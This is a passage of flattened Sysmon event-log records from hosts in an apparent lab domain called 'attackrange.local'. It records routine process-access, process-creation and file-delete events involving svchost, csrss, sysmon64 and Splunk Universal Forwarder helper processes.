Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001048649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.751{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.454{466BC892-F496-60EB-287D-00000000CF01}76761072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:50.234{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.234{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.220{466BC892-F496-60EB-287D-00000000CF01}7676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.003{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=547450F2CF40C62DA4CFCAC7C046098A,SHA256=F6242ED90EAE1ED7A42C680B4C0869E2CCB7D681D534F9D6AFD932A48B7C1D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:50.238{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E16C9B09EA34E4F29CF81B510713D8FC,SHA256=9435A91B48F627DD83EDADD83530F9A85EECFEA6E46418AE4DE8EB6B162ABA28,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.656{466BC892-F497-60EB-2A7D-00000000CF01}95407808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.488{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:51.476{466BC892-F497-60EB-2A7D-00000000CF01}9540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 